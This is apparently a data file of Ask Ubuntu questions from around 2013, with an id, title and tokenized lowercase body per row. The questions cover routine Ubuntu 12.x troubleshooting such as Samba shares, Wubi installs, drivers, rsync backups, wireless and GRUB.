259088	apparmor has hats like null-12b08	i am running a ubuntu 12.04.2 server with apache using mod_apparmor . when i run aa-status , i see thousands and thousands ( seriously , over 100,000 ) of profiles with names like /usr/lib/apache2/mpm-prefork/apache2//default_uri//null-12b08 some of them even stack : /usr/lib/apache2/mpm-prefork/apache2//scoop//null-2dd76//null-2dd77 what are these ? are they actually hats ? if so , why are there so many of them , and is that a potential problem ?
259089	ca n't do my software update `` not enough space '' but disk only half full	i went to do a software update and got the message that i need to free 10.5m out of /boot i did the trash empty and the sudo apt-get clean but that did n't help . i deleted some files in /boot but that did n't help or change the message at all . i cleaned up my hard drive and it is now less than 50 % full . that did n't help either . is the /boot somewhere else perhaps ?
259090	`` no root file system is defined error '' when installing	i tried to install ubuntu 12.10 with cd but it is not detecting my windows installation ( windows xp sp2 ) and i do n't want to do partioning manually . i then tried to install ubuntu 12.10 using wubi . then i rebooted as it asked but after some time a screen appeared saying no root file system is defined . please correct this from the partitioning screen . but the drop down box is empty . i 've tried installing wubi in c : \ and d : \ but there is no difference .
259093	youtube acting strangely	for the last couple of months , i can be browsing the youtube web site , not watching a video , and all of a sudden , audio from a advertisement will start playing . sometimes , this audio will start playing along with a video i 'm watching . if i close out that tab in firefox , it stops . i 've had this happen even while i 'm doing something completely different on the machine and youtube has been setting idle for long periods of time . i have all the pop-ups blocked , etc . anybody else experiencing this ? any suggestions ? thanks .
259094	how to mount all partitions at system startup	hello i searched for this query ( mounting all partitions on system startup ) and found answer near to it . i added this command to startup applications `` /usr/bin/udisks -- mount /dev/disk/by-uuid/a2e6a54ae6a52011 '' and other three partitions separately . when i close and open startup applications it wont save all three partitions . it is saving only the last command added . is there any way i can mount all partitions at system startup ? and the above procedure i followed is also opening that system partition resulting to delay in boot . if possible tell how to just mount all partitions but not to open all . but i want all partitions to be mount automatically . please help me . image of what i edited fstab the last three lines are the lines i added . according to your first suggestion . according to your second suggestion . this is the result of both edits . ok ... let me be more specific ... the image below shows all the partitions of my internal hard disk . 1 . i just want to mount the partitions labeled ( a ) sumana ( backups ) , ( b ) movies , doc 's and songs ( c ) personal this is the output of df -h this is the output of cat /etc/fstab and this is the uuid of all partitions . now i want to mount sda3 , sda5 and sda7 if possible even windows partition sda2 . sorry if i 'm bothering you brother . i had unix as subject and now i 'm interested in learning commands and customizing like this . and i wanted to mount . hope i 've uploaded all outputs you want .
259096	update-binfmts warning	i 'm running lubuntu on a netbook and i 've installed oracle 's jdk . everything seems to work fine . the only problem is that when the oracle jdk updates , i get the following warning : update-binfmts : warning : current package is oracle-java7 , but binary format already installed by openjdk-6 i found this link : https : //bugs.launchpad.net/ubuntu/+source/sun-java6/+bug/328174 but it seems to be talking about something specific to java-6-openjdk . when i run update-binfmts -- display i get the following output : python2.7 ( enabled ) : package = python2.7 type = magic offset = 0 magic = \x03\xf3\x0d\x0a mask = interpreter = /usr/bin/python2.7 detector = jar ( enabled ) : package = openjdk-6 type = magic offset = 0 magic = pk\x03\x04 mask = interpreter = /usr/bin/jexec detector = i do n't understand what this has to do with python . how can i get rid of this warning ? edit : ok , i know more about update-binfmts now . i can see that there are two entries in there , one for python and one for jar . i just need to change the jar entry as per the launchpad link . i 'll do that as soon as i can and mark this solved if it works . thanx , brian
259099	changing the input area for touch pad	i have a hp envy 17 laptop with a touch pad that whose 'touch input area ' includes the left and right click buttons . the problem i have with this is that when i go to click the left button it tends to move the pointer across the screen and i miss the click . is there any way to update the touch area to not include the bottom quarter inch ?
259102	android phones supporting ubuntu	which android phones support ubuntu ? i have seen a video that ubuntu phone can be made pc by docking . can someone suggest me which phone to buy that have such docking facility . if not docking , usb cable will be fine . if you know , then give me brand name and model .
259104	how can i remove windows ?	i installed ubuntu 12.10 with wubi using a pen drive as a data file ( i just copied wubi and ubuntu iso ) and it works pretty fine . i tried many times to simply click on the iso and install , also recording it in a disk , but i get the `` unable to find a medium containing a live file system '' error . that 's why i used the wubi . but now i want to get rid of windows xp but i do n't know how . help , please ? is there any other way to get ubuntu without windows ? i can use a usb , but i 'm afraid of that error again . please , help !
259107	can i use 12.04 to build ubuntu phone apps ?	can i use 12.04 to build ubuntu phone apps ? the example indicates 12.10 .
259109	12.10 , ati drivers help ?	i just downloaded ubuntu today and i love it ! i 'm trying to install the ati drivers by the guide posted here , but i get an error after i choose to generate the drivers for the distro , and i get the following in the log file : package build failed ! package build utility output : ./packages/ubuntu/ati-packager.sh : 294 : ./packages/ubuntu/ati-packager.sh : debclean : not found ./packages/ubuntu/ati-packager.sh : 295 : ./packages/ubuntu/ati-packager.sh : dpkg-buildpackage : not found ./packages/ubuntu/ati-packager.sh : 294 : ./packages/ubuntu/ati-packager.sh : debclean : not found ./packages/ubuntu/ati-packager.sh : 295 : ./packages/ubuntu/ati-packager.sh : dpkg-buildpackage : not found [ error ] generate package - error generating package : ubuntu/quantal can someone provide some help here ? i 'd like to get this working right soon .
259112	wired connection does not work after fixing wireless problem for asus u56e and ubuntu 12.04 lts	after fixing what appears to be a universal bug concerning wireless on an asus u56e notebook running ubuntu 12.04 , my wired connection has stopped working . the fix i found was : how do i get wireless working on an asus notebook u56e when the wireless works , the wired does not . when i remove the command from the file that makes the fix permanent and restart , the wireless no longer works and the wired works again . still new to linux , so i may be overlooking something , but does anyone have any thoughts on this problem ? wireless and wired hardware info : 02:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n + wimax 6150 [ 8086:0885 ] ( rev 67 ) 04:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8151 v2.0 gigabit ethernet [ 1969:1083 ] ( rev c0 ) the conf file is named : /etc/modprobe.d/iwlagn.conf and the content is options iwlwifi bt_coex_active=0
259114	reading package lists in update apt-get ubuntu 12.04 vps	i have vps and i try to install some packages but i ca n't , when i try to update my package list , i get an error . i 'm using sudo apt-get update at the end of all process display : reading package lists ... error ! i ca n't install anything , i try to clean , sudo apt-get clean i try this : sudo rm -rf /var/lib/apt/lists/* -rf and then try to update but all time return the same error .
259124	video runs locally but not on apache 2 server	i have a simple html page in which i am running video using html5 tags , when i run that page using firefox it runs the page and video properly . but when i run this page by setting the apache server using localhost it does n't run . what could be the issue , what settings are required . this is the path of my 'local-host ' : '' localhost/ubuntu/index.html '' and the code of my index.html page is : < img src= '' index.jpeg '' > < video controls preload= '' auto '' loop > < source src= '' test.ogv '' type= '' application/ogg ; codecs= '' dirac , vorbis '' '' / > < source src= '' test.mp4 '' type= '' video/mp4 ; codecs= '' avc1.42e01e , mp4a.40.2 '' '' / > < /video > < /div > < /form > should i have to set mime type for apache server . i am new to linux so please give me code suggestions quickly . regards
259126	how to make firefox ignore gnome 's theme ?	i installed a new theme called boje in my gnome and it looks pretty good . the problem comes when i open firefox : i see that all html form inputs like , for example , textareas or simply text input have a dark style like my gtk theme . it is a problem for me because it makes all light websites looks a dark style , very ugly . i was searching in the css of the theme but i do n't find anything related to html elements and i do n't know how i can do to fix this . i 've tried change my firefox theme without success .
259127	manually adding installed package	i built some packages myself using make & make install instead of apt-get because some packages in ubuntu repositories are not the latest version , sometimes not new enough to build some package depending on it . however when i wanted to install something by apt later , it told me that some dependencies did n't meet . so is there any chance that i can get apt to realize that there is something newer than the packages in its repositories ?
259128	is ubuntu developer 's preview going to be installable on nexus 10 ( besides nexus 7 ) ?	this article at arstechnica suggests nexus 7 and nexus 10 will be supported by upcoming developer 's preview of ubuntu for tablets . is that statement backed by some canonical 's source ? is nexus 10 going really to be supported ?
259131	overheating problem	hello ubuntu comunity . i recently installed ubuntu 12.10 on my hp notebook ( i7 2.0 ghz , 4gb memory ram ) and i 'm noticing that my computer temperature is rising up to 90-96ยบ celcius within the first half hour that i start running ubuntu . not so long ago i cleaned up the fan and on windows , my notebook does not overheat . dust is not the problem . there doesnt seem to be a process consuming a lot of resources . i had the same problem before with lubuntu and kubuntu . with kubuntu after an update , it got miraculously fixed . i belive its a video card driver problem , i tried to install the drivers manually from the website ( i got a ati radeon hd 6770 ) but failed on the installation process ( it goes unresponsive when trying to install ) . edit 1 : result of doing a lspci -nn | grep vga : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati whistler xt [ amd radeon hd 6700m series ] [ 1002:6740 ] thanks in advance..
259140	regarding installation of ubuntu sdk	i 'm very eager in developing mobile apps for ubuntu . i followed the instruction given in the http : //developer.ubuntu.com/get-started/gomobile/ website . but i could not install completely . was gving error regarding qt . saying qmlscence executable is not found . however i followed the instruction to manually configure it . but there was nothing under opt/ directory . i 'm having ubuntu 12.04 64 bit .
259142	ubuntu 12.10 : window switching using key combination alt-tab changes behaviour when using alt specified by xmodmap	alt-tab normally lets you cycle through open windows and changes focus to the window that is active when you release alt . this is all fine , but i want to use another key for alt_l so i 've specified keycode 102 = alt_l meta_l alt_l meta_l in my .xmodmap . this works in general , but it does n't work as expected for switching windows . the difference from the normal alt-tab is that a window is that even if i release alt ( and tab ) , a window is not chosen . if i press enter or the standard alt at that stage , the window is chosen though . the following is the xev output for the two different keys . for old alt key : keypress event , serial 41 , synthetic no , window 0x4a00001 , root 0xd9 , subw 0x0 , time 9580170 , ( -380,284 ) , root : ( 245,336 ) , state 0x0 , keycode 64 ( keysym 0xffe9 , alt_l ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 41 , synthetic no , window 0x4a00001 , root 0xd9 , subw 0x0 , time 9580241 , ( -380,284 ) , root : ( 245,336 ) , state 0x8 , keycode 64 ( keysym 0xffe9 , alt_l ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false for new alt key : keypress event , serial 41 , synthetic no , window 0x4a00001 , root 0xd9 , subw 0x0 , time 9576192 , ( -380,284 ) , root : ( 245,336 ) , state 0x0 , keycode 102 ( keysym 0xffe9 , alt_l ) , same_screen yes , xkeysymtokeycode returns keycode : 64 xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 41 , synthetic no , window 0x4a00001 , root 0xd9 , subw 0x0 , time 9576302 , ( -380,284 ) , root : ( 245,336 ) , state 0x8 , keycode 102 ( keysym 0xffe9 , alt_l ) , same_screen yes , xkeysymtokeycode returns keycode : 64 xlookupstring gives 0 bytes : xfilterevent returns : false so how can this behaviour be changed so that i can use my new alt key in the exact same way as the old one when switching between windows with alt-tab ?
259143	ubuntu wont sleep when wireless on	when i make my notebook ( lenovo s12 ion ) sleep ( from menu , or s2ram ) he awakes right after . i figured out that when i turn hw switch for wireless of , it works just fine . what should i do ? thanks . ubuntu 12.10 , proprietaly nvidia drivers .
259144	rsync remove old backup on remote pc	good day i use this script to backup my home pc to remote pc # ! /bin/bash # todays date in iso-8601 format : day0=`date -i` # yesterdays date in iso-8601 format : day1=`date -i -d `` 1 day ago '' ` # the source directory : src= '' /home/honza/downloads/ '' # the target directory : trg= '' honza @ 192.168.80.197 : /media/zaloha/ $ day0 '' # the link destination directory : lnk= '' honza @ 192.168.80.195 : /media/zaloha/ $ day1 '' # the rsync options : opt= '' -avh -- delete -- link-dest= $ lnk # execute the backup rsync $ opt $ src $ trg # 3 days ago in iso-8601 format day3=`date -i -d `` 3 days ago '' ` # delete the backup from 3 days ago , if it exists if [ -d /honza @ 192.168.80.197 : /media/zaloha/ $ day3 ] then rm -r /honza @ 192.168.80.197 : /media/zaloha/ $ day3 fi i dont't know how to delete old backup than 3 days . script works well when i backup on the same pc but not on a remote . -- link-dest arg does not exist : /honza @ 192.168.80.195 : /media/zaloha/2013-03-15 and old backups are not deleted . it also works well when a script is running on the remote pc . a src is src = `` honza @ 192.168.80.197 : /home/hunts/downloads '' but i do not know if it is the management solution ? thank you
259149	what is the default ubuntu 12.10 firewall ?	i have been trying to get ubuntu one to work ( i.e . sync my files ) , but it keeps saying that it is `` getting information '' and `` please wait '' . i only have 338mb used on my ubuntu , so it should n't take that long , should it ? i read that this was due to a firewall issue . i ca n't seem to locate the place at which i would change the settings . where would i go ? thanks .
259152	can not read cd/dvd	whenever i insert a cd/dvd in my drive , i can not read them . tried manually mounting them , but it shows : no medium found on /dev/sr0 . i can only burn dvd ( but not cd ) . my drive is okay , if i boot into slax from my pendrive , i can read cd/dvd .
259153	checking libreoffice-saved microsoft word files	i 'm looking for a method to verify that a .doc or .docx file that has been created in microsoft word , and then modified in ubuntu ( in my case , with libreoffice ) will look the same when i give it to people using microsoft word . unfortunately , they need the ability to edit it afterward , or i would just export the files as pdfs . i can see that the files remain more or less the same , but what i 'd like is to be able to check it every time before i send the file back . a 100 % accurate viewer could solve this , or an on-line method . any ( preferably easy-to-implement ) ideas ?
259154	samba & vlc ubuntu 12.10 . cant start movie and forgets mount password	after upgrading to 12.10 i get problem with vlc . it does hangs if i start a movie from a file on a shared driver over the network . is there any sugestion when this bug will be fixed or shall i move back to 12.04 until 13.04 arrives ? i also have problem that when i mount a drive i am asked to save the password . ubuntu 12.10 does not remember the password like it did in 12.04 .
259155	how to fix a permissions problem on www folder ?	i have created a directory in my www folder using terminal and root user . then , create some text files in that folder ( with terminal and root user ) . now , when i want to access these files and directory via browser , apache said : 403 forbidden . you do n't have permission to access /folder on this server . other files and folders in www directory are accessible via browser ( i uploaded them via ftp client ) . how can this be fixed ?
259163	i tried to update my ubuntu but not work . it appeared failed to fetch http : //archive ... ../ubuntu/dists/jaunty/universe/binary-i386/	i tried to update my ubuntu but not work . i have changed and select other places from the software sources to other servers and tried and tried.. still get : failed to fetch http : //archive.linux.duke.edu/ubuntu/dists/jaunty/universe/binary-i386/packages 404 not found failed to fetch http : //archive.linux.duke.edu/ubuntu/dists/jaunty/main/binary-i386/packages 404 not found ... some index files failed to download , they have been ignored , or old ones used instead . can anyone help ?
259166	change port for desktop sharing in ubuntu 12.10	i was looking to change the port in ubuntu 12.10 for desktop sharing . i , ve done it before but have since clean installed and ca n't remember where to change it . it was an interface similar to gconf-editor . cheers chris
259168	not enough space on hard drive for tf2	i 'm fairly new to linux and ubuntu , and i recently wanted to install tf2 on ubuntu . when i tried to install it through steam it said tf2 was about 11gb and i there was only 2gb available so i could n't install it . so i checked my harddrive and my external one i was running ubuntu on , the external one had at least 400 gigabytes free and the other one had about 180 . what 's going on ? and how do i fix it ? output of df -h filesystem size used avail use % mounted on /dev/loop0 3.9g 1.1g 2.6g 30 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 752m 908k 751m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 868k 1.9g 1 % /run/shm none 100m 56k 100m 1 % /run/user /dev/sdb1 466g 20g 446g 5 % /host /dev/loop1 3.9g 2.1g 1.6g 58 % /usr /dev/loop2 3.9g 840m 2.9g 23 % /home /dev/sda3 454g 286g 168g 64 % /media/isaac/acer so i tried adding a library folder in /media/isaac/acer but this error came up in steam : '' new steam library folder must be on a filesystem mounted with execute permissions '' i have never seen this error before and i did a bit of research about it and i still have no idea how to fix it . a bit of information i do n't know if this helps but i think ( it might be fat 32 , neeed to double check ) i 'm running ubuntu off a ntfs external hard drive .
259169	are there any alternative time and date applets for gnome panel ?	the default time and date applet for gnome panel ( in gnome classic ) is buggy and leaks memory . are there any alternatives i can download ? i 'm looking for something that will display the current date and time , and ideally have options for displaying other time zones .
259172	connecting to remote ubuntu desktop ?	i installed ubuntu desktop 12.04 on my server , but i want to be able to connect using vnc from my mac . i can not login to the desktop as its at a different physical location , i only have ssh at my disposal ... how do i setup my remote ubuntu install to allow remote desktop connections so i can use the desktop environment remotely ?
259174	add a custom text to gnome panel	i want to add some text to the gnome panel in gnome classic . i got a suggestion from this blog but it dates back to 2008 and does n't seem applicable now . in ubuntu 12.10 and gnome classic , the option of /apps/panel/applets/clock_screen0/prefs/custom_format in gconf-editor is missing . so is there any way i can add custom text to the clock in gnome classic ? also is there any other applet/extension available which allows us to add a text to the gnome panel ?
259177	problem sharing printer via samba in ubuntu server 12.04	i have cannon imagerunner 1133 i want to share it through samba with cups server installed on ubuntu server 12.04 it works all fine i installed samba and cups server ubuntu and windows clients can successfully print via samba but i want every user when they click the share printer they should be prompted for username and password for this i have edited smb.conf file and set guest ok = no under printers it works for ubuntu clients but when windows 7 clients click on the share printer it does not prompt for username and password
259184	hp probook 4510s overheating issue	i have an hp probook 4510s running ubuntu 12.10 with open source radeon drivers also i keep my computer clean and dust free . the following output of the sensors command is worrying me . acpitz-virtual-0 adapter : virtual device temp1 : +77.0°c ( crit = +108.0°c ) temp2 : +40.0°c ( crit = +100.0°c ) temp3 : +45.0°c ( crit = +103.0°c ) temp4 : +47.0°c ( crit = +105.0°c ) temp5 : +26.8°c ( crit = +103.0°c ) temp6 : +55.0°c ( crit = +110.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +44.0°c ( high = +100.0°c , crit = +100.0°c ) core 1 : +44.0°c ( high = +100.0°c , crit = +100.0°c ) as you can see temp1 says 77 degrees ( this can go up to 81 degrees and after booting in the morning when the laptop is completely cold it says 50 degrees ) . is there a way to know which component this is ? i wonder if this is just a display bug or a real overheating issue since i am not really experiencing any issues with the laptop . also does anyone know of an alternative way of checking the temperatures ( running latest bios but i see no options to view temperatures ) ? edit : after some research it seems that temp1 is the temperature of my gpu and apparently temperature from 70 to 80 degrees is acceptable ( but still a bit hot ) . i have also tried changing the power profile to dynamic which does drop the temperature to about 70 degrees but i found the occasional flicker annoying so i opted to set the power profile to auto instead ( high when plugged into power , medium on battery ) . this results in around 78-80 degrees when plugged in and about 70-72 degrees when on battery . after that i also enabled fan always on an ac power in bios which dropped my plugged in gpu temperature to 77-79 . still not too completely happy with this but its best i have so far ( any further ideas are welcome ) . link to change power profiles : set ati/amd gpu fan speed with mesa driver edit 2 : in the end the only solution was to revert to 12.04.1 ( not 12.04.2 ) so i could use the closed source amd radeon drivers . with regular desktop usage i now get around 65-68 degrees temperature as well as much better performance . sad to say but the open source radeon drivers are not nearly as good as the closed source ones .
259187	how to set a path of proofpower in ubuntu 12.04	respected fellows , i am using a formal verification tool proofpower in ubuntu 12.04 , but i do n't that how can i set a path or environment variables in ubuntu 12.04 . my proofpower bin path is : /home/username/pp/bin/ thanks in advance
259190	xubuntu : no password request after suspension	if i suspend my xubuntu 12.10 , and then take my computer off the suspension , it does n't request any password . i have tried adding the gnome-screensaver on autostart settings , which i read somewhere ( go to settings manager > sessions and startup > application autostarts > add [ gnome-screensaver ] ) , but that does n't work . how can i make my xubuntu request a password after suspension ?
259191	nohup with mysql command	i need to run in background mode some mysql-query ... but how can i do this with nohup ? standartly i do : musql -uroot -p use somedb ; select * from blablalba ; but how can i do this with launching in db process ? i do mysql importing with nohup , but how with query ?
259196	how do i get wubi to show ?	i am running windows xp , inside bootmgr ( i do n't know why it is n't ntldr , the pc just came like that ) , and have installed wubi . when i boot up , bootmgr ( windows boot manager ) still shows only windows and system restore , same as it did before , and times out after 5 secs . what my question is , is how do i get ubuntu to show in that list ? my boot.ini file , as requested : [ boot loader ] timeout=60 default=multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 2 ) \windows [ operating systems ] multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 2 ) \windows= '' microsoft windows xp professional '' /fastdetect /noexecute=optout c : \wubildr.mbr = `` ubuntu '' although i believe this info is irrelevant as i am running inside bootmgr , not ntldr , for which boot.ini is the settings file . bcdedit results in windows xp command prompt : c : \documents and settings\ [ my username ] > bcdedit 'bcdedit ' is not recognized as an internal or external command , operable program or batch file .
259199	how do i remove gnome and restore unity in 12.10 ?	i 'm new to ubuntu and someone suggested i install gnome , only i was unaware it was a gui mod . the log-in menu now has drop down for gnome selection and such , as well as ubuntu , however the gnome options give me the drop down menus and ubuntu loads a blank screen and i 've no way to interact . if i could even find a way to add `` unity '' into the drop down box and use it ( so i could swap between gnome and unity easily ) that would be swell . any suggestions ?
259201	why does network-manager always keep trying to connect to neighbours wifi ?	i am using ubuntu 12.04 precise pangolin with graphic interface gnome3 . my wifi card detects like 20 diffrent acces points . sometimes i want to stay unconnected , but not have to disable my wifi device . i keep getting popups requesting wep and wpa passwords . i went to net config window and disabled the 'connect automatically ' for all the acces points i could ( like 5 of them ) . the other 15 i can not access the checkbox to turn off the automatically option and i keep getting popups requesting passwords . i not only get 1 popup for every attempt , i get two for each one , one from network-manager and another one from gnome3 . this last one i can not move to a side , it literally blocks up all the screen . and when it 's gone over all the access points , it starts again with the first one ... i really want to know if there is some way to turn off this 'need for connection ' that the ubuntu 12.04 network-manager has . and simply let the wifi card enabled but without attempting connections . i could do it on 10.04 . i really think that having to turn off the 'automatically connect ' for all of the access points my card detects is not the way to do it . even if i try to , i keep having like 15 of them with the grey , unaccessable checkbox . i appreciate any help .
259202	samba configuration	i am having a problem when configuring samba i manage to login to samba and create a folder and configure it t share . i can see the the folder on my windows machine but when trying to click in it it says that i have no permissions i have added acess to all users on samba config should i try to remove and re-install samba ? if so would be the command ? could it be an issue with the actual drive permission that the folder is at ? when i try to do it from the gui in ubunutu ( bypassing samba ) i get error net usershar : can not pen usershare directory error permition denied any ideas ? thanks
259205	running fstrim with traditional hdd mounted in /dev/media	is it safe to run fstrim -v / if i have rotational hdd mounted in /dev/media ? for now , whenever i want to trim the ssd i just unmount those drives , run fstrim and mount them again .
259207	how do i access a password protected share from nautilus ?	i can access the server and non password protected shares by using the following commands : ctrl + l smb : //server/share i can connect to the share using smbclient //server/share -u i can connect using the command line using the following command : sudo mount -t cifs //server/share -o username=user , password=password , uid=1000 , gid=1000 , iocharset=utf8 , file_mode=0777 , dir_mode=0777 how do i connect to this share using nautilus 3.6.3 ?
259215	sharing a second hard drve with windows using samba	i installed ubuntu 12.10 32bit with the intention of using it to share hard drives across an office of windows 7 computers . i 've set up an initial share on the hard drive ubuntu was installed from with no issues - windows can see , read and write to this drive . i did this using the gui ( right click > properties > share ) and a small amount of editing samba 's preferences . my problem came when i added a second drive . i 've formatted it as ext4 and mounted it , and shared it through the right click menu as before . however , though windows can see the folder , when i try to access it i get a `` windows can not access ... '' permissions message . this only happens on the second drive . if it 's of any help , here 's my fdisk -l : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000b4feb device boot start end blocks id system /dev/sda1 * 2048 1928376319 964187136 83 linux /dev/sda2 1928378366 1953523711 12572673 5 extended /dev/sda5 1928378368 1953523711 12572672 82 linux swap / solaris warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 1 1953525167 976762583+ ee gpt it 's the disk at `` dev/sdb1 '' i 'm attempting to share . i also tried manually adding this to my fstab , but this does n't change things one way or the other : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=8aea5b44-a5f0-4d0e-8e22-53c3838a8ede / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=5d4ac6d9-a9a1-4ed6-bee5-ab72fed15b12 none swap sw 0 0 /dev/sbd1 /media/revolution/data ext4 defaults 0 0 any help would be greatly appreciated .
259216	acer aspire 4755g 'secure boot not enabled ' while booting liveusb ubuntu with ubuntu builder	my acer aspire 4755g had a windows 7 home premium pre-installed when i bought it . i immediately installed ubuntu 12.04 alongside of it , with grub and burg . now , recently , windows 7 became very slow , as usual . so i wanted to re-install it , and what i did was this : i booted up from a windows 7 ultimate ( 64-bit ) usb and installed windows 7 ultimate over the old windows 7 home premium partition . everything went fine and once it was installed i could get into windows 7 , but of course my grub/burg was n't there anymore . now , i was trying to fix this by booting off of a custom ubuntu 12.10 live cd made with the ubuntu builder , and restoring grub/burg . unfortunately , every time i boot my laptop , press f12 and select 'usb disk 2.0 ' it returns a black screen , and pops 'secure boot not enabled ' up for maybe half a second , and then the usb light stops blinking ( indicating that there is no activity ) ... for some weird reason i 'm able to boot into backtrack from a liveusb but it refuses to boot either my custom ubuntu liveusb , or the standard ubuntu 12.10 version ... any ideas ? thanks for the help .
259217	can any body tell me how to test ftp server in ubuntu machine ?	i tried with several ways which is given like telnet to test whether my ftp server workig properly or not . those are like rama @ rama-desktop : ~ $ telnet 192.164.0.102 21 trying 192.168.0.102 ... telnet : unable to connect to remote host : connection refused rama @ rama-desktop : ~ $ telnet 127.0.0.1 21 telnet : unable to connect to remote host : connection refused ftp ramaftp @ 127.0.0.1 ftp : ramaftp @ 127.0.0.1 : no address associated with hostname above ramaftp is the username that i have created earlier . i am novice to ubuntu . please help me how to reset the ftp username and password for my machine . any help would be greatly appreciated . i have used the following way : sudo mkdir /srv/ftp sudo usermod -d /srv/ftp ftp sudo /etc/init.d/vsftpd restart modified conf file : local_enable=yes write_enable=yes restarted server with service vsftpd restart : stop : unknown instance : start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.72 '' ( uid=1000 pid=3629 comm= '' start vsftpd `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) this is the error that i got , thanks
259219	how to read shutdown/reboot log	i own a laptop running 12.10 with gnome 3.6 ( installed on a ssd ) . i have been noticing since 12.04 that when rebooting , the computer hangs for about 30 seconds ( sometimes even more ) with a black screen and the laptop fan at maximum speed , before booting up again . on the other hand , the shutdown process is considerably faster . is there way to check the shutdown log , to help identify a problem ?
259223	why do i get `` wireless unavailable '' ?	i have installed ubuntu 12.04. on my dell inspirion mini 1018 . after doing one of regular updates , my wifi stopped working , and it gives me message wireless is disabled by hardware switch . how can i enable it ? i tried opening network connections , but there i find : wireless unavailable . hardware address 1c:65:9d:68:9e:6b then i tried system testing , it gives me a message : # for some atheros 5k rf macs , the madwifi driver loads buts fails to # correctly initialize the hardware , leaving it in a state from # which ath5k can not recover . to prevent this condition , stop # madwifi from loading by default . use jockey to select one driver # or the other . ( ubuntu : # 315056 , # 323830 ) blacklist ath_pci '' this what i get after nm-tool : type : 802.11 wifi driver : rtl8192ce state : unavailable default : no hw address : 1c:65:9d:68:9e:6b capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points next command i used sudo lshw -c network *-network disabled description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : wlan0 version : 01 serial : 1c:65:9d:68:9e:6b width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.2.0-37-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 ioport:3000 ( size=256 ) memory : f0100000-f0103fff as i am new on ubuntu , i asked on newbees forum , and here is what i did so far http : //ubuntuforums.org/showthread.php ? t=2116769 one who was guiding me has no idea what to try next .
259228	which download manager gives similar functionallity like internet download manager for windows ?	i require a single download manager which has the following functionality : download acceleration . firefox integration download streaming online videos . download management . automated system shutdown . pause/resume supports for my downloads
259230	xrandr config not loading properly at startup from .xprofile	i 'm using xrandr to rescale the resolution on a netbook ( ubuntu 12.10 ) . when i run the following command it works fine : xrandr -- output lvds1 -- mode 1024x600 -- panning 1280x720 -- scale 1.25x1.2 however when i put that command into .xprofile to load it at startup the screen has a black border in the expanded area rather than the proper output . i 'm using exactly the same command so i 'm not sure why it 's not working .
259231	gwibber facebook login ( was virus facebook login )	every minute a google-chrome pages is open with this url https : //www.facebook.com/connect/login_success.html # access_token= ... .. where the token is my authentication token.. this is my ps aux result after killing chrome ( otherwise i would have tons of chrome opened.. ) http : //pastebin.com/g6ykjwj5 i have ubuntu 12.10 . any idea ? edit : if i change firefox as default browser the page is opened with firefox
259234	where do i find a terminal lens for unity ?	i have been googling for a terminal lens , i.e . a unity lens that integrates the terminal into the usual dash replaces the current alt+f2 functionality . for instance one could have a line of icons as it currently is , with command history sensitive to the typed word , and below that terminal output . all i could find on this were stale old posts in the ubuntu forums and an old brainstorm . does anyone know of a working terminal lens for unity , like my mock-up above ?
259237	disabled desktop expo through compiz manager and now no desktop	i disabled the expo in order to remove the workspaces , but now i dont have anything but blank desktop . the apps panel and the menu panel are gone an di ahve no idea how to restore them
259239	empathy and google hosts	i set static ip in /etc/hosts for some google sites ( google is blocked frequently in china ) . then empathy can not login with google account . how can i make empathy work with hosts binding ? i am sure earlier version empathy works well .
259240	grub wo n't boot after ubuntu upgrade	after i updated my system with apt-get upgrade , i rebooted and landed at the grub > promt . i was n't able to set any root and booted always to kernel panic . i then started a live cd and used https : //help.ubuntu.com/community/boot-repair . after i used this tool i now get : error : out of disk error : could't read file . press any key to continue ... here is what boot-repair produced : http : //paste.ubuntu.com/1691134/ can somebody guide me to the right setup for my problem or how i reset the grub settings to the proper ones ?
